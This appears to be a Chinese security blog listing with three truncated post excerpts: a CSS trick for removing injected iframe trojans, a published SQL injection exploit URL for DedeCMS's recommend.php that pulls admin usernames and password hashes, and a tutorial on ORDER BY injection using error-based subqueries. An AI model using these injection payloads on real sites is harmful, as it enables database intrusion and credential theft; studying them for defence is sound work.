2022年04月20日
其实如果要防止被挂IFRAME木马,方法很简单,只需要利用JavaScript对IFRAME进行控制即可。方法如下: 复制代码代码如下: iframe{ v:expression(this.src='about:blank',this.outerHTML='');/*使用CSS属性去除所有IFRAME*/ } #htmer{v:expression() !important} /*如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="htmer",如果你的网页中没有用到IFRAM
2022年04月20日
近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: EXP: 复制代码代码如下:http://*.*.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` l
2022年04月20日
一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL] select username,password from uc_members order by 1,If((select 1)=2,1,(select value from uc_settings));返回错误:[Err] 1242 - Subqu